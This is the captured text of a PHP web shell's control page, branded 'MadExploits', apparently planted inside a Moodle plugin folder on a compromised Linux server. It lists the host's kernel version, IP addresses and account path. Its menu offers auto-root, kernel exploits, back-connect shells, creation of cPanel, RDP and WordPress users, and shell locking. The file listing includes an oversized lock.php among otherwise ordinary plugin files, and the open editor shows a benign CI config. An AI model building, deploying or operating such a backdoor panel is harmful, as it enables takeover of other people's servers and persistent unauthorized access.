Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.6.165
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
calendar /
type /
ummulqora /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
privacy
[ DIR ]
drwxr-xr-x
.travis.yml
1.05
KB
-rw-r--r--
LICENSE
33.71
KB
-rw-r--r--
README.md
2.21
KB
-rw-r--r--
cloud.php
25.87
KB
-rw-r--r--
lock.php
358.07
KB
-rw-r--r--
thirdpartylibs.xml
254
B
-rw-r--r--
version.php
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php addons: postgresql: "9.4" services: - mysql - postgresql - docker cache: directories: - $HOME/.composer/cache - $HOME/.npm php: - 7.1 - 7.2 - 7.3 env: global: - MOODLE_BRANCH=MOODLE_38_STABLE - MOODLE_BRANCH=MOODLE_39_STABLE - MOODLE_BRANCH=MOODLE_310_STABLE matrix: - DB=pgsql - DB=mysqli before_install: - phpenv config-rm xdebug.ini - nvm install 8.9 - nvm use 8.9 - cd ../.. - composer create-project -n --no-dev --prefer-dist blackboard-open-source/moodle-plugin-ci ci ^2 - export PATH="$(cd ci/bin; pwd):$(cd ci/vendor/bin; pwd):$PATH" - docker run -d -p 127.0.0.1:4444:4444 --net=host -v /dev/shm:/dev/shm selenium/standalone-firefox:3 install: - moodle-plugin-ci install script: - moodle-plugin-ci phplint - moodle-plugin-ci phpcpd - moodle-plugin-ci phpmd - moodle-plugin-ci codechecker - moodle-plugin-ci validate - moodle-plugin-ci savepoints - moodle-plugin-ci mustache - moodle-plugin-ci grunt - moodle-plugin-ci phpdoc - moodle-plugin-ci phpunit - moodle-plugin-ci behat
Close